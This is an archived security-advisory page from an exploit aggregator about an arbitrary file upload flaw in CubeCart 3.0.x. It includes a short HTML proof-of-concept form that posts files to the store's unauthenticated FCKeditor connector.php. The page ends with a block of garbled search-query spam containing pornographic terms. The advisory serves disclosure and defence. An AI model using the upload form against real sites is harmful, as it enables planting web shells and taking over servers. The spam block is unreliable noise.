exploits , vulnerabilities , articles , CubeCart Arbitrary File Upload Vulnerability

Title	CubeCart Arbitrary File Upload Vulnerability
Published	2006-02-23-12:00AM
Updated	2006-02-24-07:02PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	NSA Group is credited with the discovery of this vulnerability.
Vulnerable	CubeCart CubeCart 3.0.7 pl1 CubeCart CubeCart 3.0.6 CubeCart CubeCart 3.0.4 CubeCart CubeCart 3.0.3
Not Vulnerable	CubeCart CubeCart 3.0.7
Code	This issue can be exploited with a web client. The following proof of concept is available: <form action="http://www.example.com/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFol der=/" method="POST" enctype="multipart/form-data"> File Upload<br> <input id="txtFileUpload" type="file" name="NewFile"> <br> <input type="submit" value="Upload"> </form>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 GNU Automake Insecure Directory Permissions Vulnerability
2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Mozilla Firefox CVE-2009-3981 Remote Memory Corruption Vulnerability
2009-12-17 Drupal Sections Module HTML Injection Vulnerability
2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 18:31:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
/search/ex WWW.GOOGLE kayako esu Amerikasex /search/ex www.999ktv ...t/comp free sexy fucking im GET+%252Fg %252Fadmin www.lhyule exim SMTP OpenSSH 3. news for c www.766wz. Www sexypi W.w.w.worl /search/ex www.sex.c www,&a xxxlsex.co Download f free fucki Wap.Sexy.C WebConnect search/exp www.b2bwir cve-1999-0 homose Easy PHP C www,indian bad jojo.c www .old l wudem.com. free porn Wap.Sexy.C IPB 2.1.7 ww.sex.com image zahr sexegurl blak girls freesexvid 200 /compo 18to20 joomlsa news for c sexwomen.c Www.topsex a5158.cn